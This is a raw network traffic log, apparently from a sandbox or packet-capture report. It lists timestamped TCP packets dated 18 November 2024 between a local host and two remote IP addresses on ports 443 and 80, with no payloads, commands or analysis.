                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350733042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350783110 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350790977 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350796938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350842953 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350852013 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.350892067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.351583958 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.351655960 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.351663113 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352284908 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352339029 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352365017 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352376938 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352420092 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352426052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352437973 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352524996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352531910 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.352574110 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353353024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353420973 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353426933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353455067 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353511095 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.353518009 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354300022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354362011 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354368925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354409933 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354468107 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.354475021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355098963 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355160952 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355169058 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355475903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355535984 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355542898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355585098 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355643988 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.355649948 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356560946 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356632948 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356640100 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356679916 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356739998 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356748104 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356782913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356925964 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.356931925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357458115 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357525110 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357531071 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357568026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357626915 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.357634068 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358392954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358455896 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358463049 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358530998 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358589888 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358602047 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358632088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358683109 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.358689070 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359520912 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359579086 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359586954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359628916 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359699011 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.359705925 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363622904 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363756895 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363763094 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363782883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363833904 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363894939 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363954067 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.363969088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398160934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398248911 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398277998 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398478031 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398540020 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.398549080 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399070024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399138927 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399146080 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399441004 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399528027 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.399535894 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400028944 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400100946 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400108099 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400523901 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400593042 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400600910 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400886059 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400954962 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.400962114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401137114 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401201963 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401209116 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401525021 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401588917 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.401597023 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429470062 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429552078 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.429568052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475074053 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475210905 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475229025 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475294113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475306988 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475567102 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475630045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475660086 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475886106 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475941896 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.475950003 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.516882896 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.516984940 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517004967 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517221928 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517261028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517292023 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517299891 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517338037 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517680883 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517750025 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.517757893 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518095016 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518158913 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.518165112 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520817995 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520879030 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.520903111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521173954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521238089 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521251917 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521711111 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521769047 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521770954 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521787882 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521831989 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521842957 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.521958113 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522396088 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522454977 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.522466898 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548202038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548284054 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548311949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548455954 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548515081 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.548523903 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.593930960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594029903 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594084024 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594207048 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594239950 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594310045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594310045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.594336987 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635668039 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635741949 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635756969 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635879993 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635920048 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635943890 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635951996 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.635962009 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636280060 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636337996 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636343956 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636723042 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636784077 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.636791945 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637115002 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637197971 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.637204885 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639307022 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639370918 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639378071 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639674902 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639744997 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.639751911 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640202999 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640285015 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640291929 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640593052 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640662909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640671968 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.640943050 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.641007900 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.641015053 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667419910 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667498112 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667505980 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667630911 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667695045 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.667702913 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.709477901 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.712774038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.712785006 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.712853909 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.712868929 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.713144064 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.713201046 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.713207960 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754179001 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754326105 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754338026 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754722118 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754765987 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754796982 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754806995 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.754818916 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755012989 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755074024 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755084038 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755201101 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755263090 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755269051 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755815983 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755880117 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755887985 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755930901 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.755995989 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.756001949 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.759501934 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.759582043 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.759591103 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.760519028 CET44349706142.215.209.78192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.760580063 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:38.762568951 CET49706443192.168.2.8142.215.209.78
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.825814962 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.832340956 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.833765984 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.833884954 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:55.838738918 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510338068 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510385036 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510396957 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510416985 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510430098 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510441065 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510447979 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510462046 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510461092 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510493994 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510507107 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510512114 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510520935 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.510679960 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.515561104 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.515611887 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.515624046 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.515661955 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.568876982 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627480984 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627537966 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627557993 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627654076 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627876043 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627911091 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627928972 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627931118 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627948999 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627968073 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.627983093 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628016949 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628154993 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628174067 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628232002 CET5564880192.168.2.823.94.171.138
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628803015 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628854036 CET805564823.94.171.138192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:52:56.628870964 CET805564823.94.171.138192.168.2.8
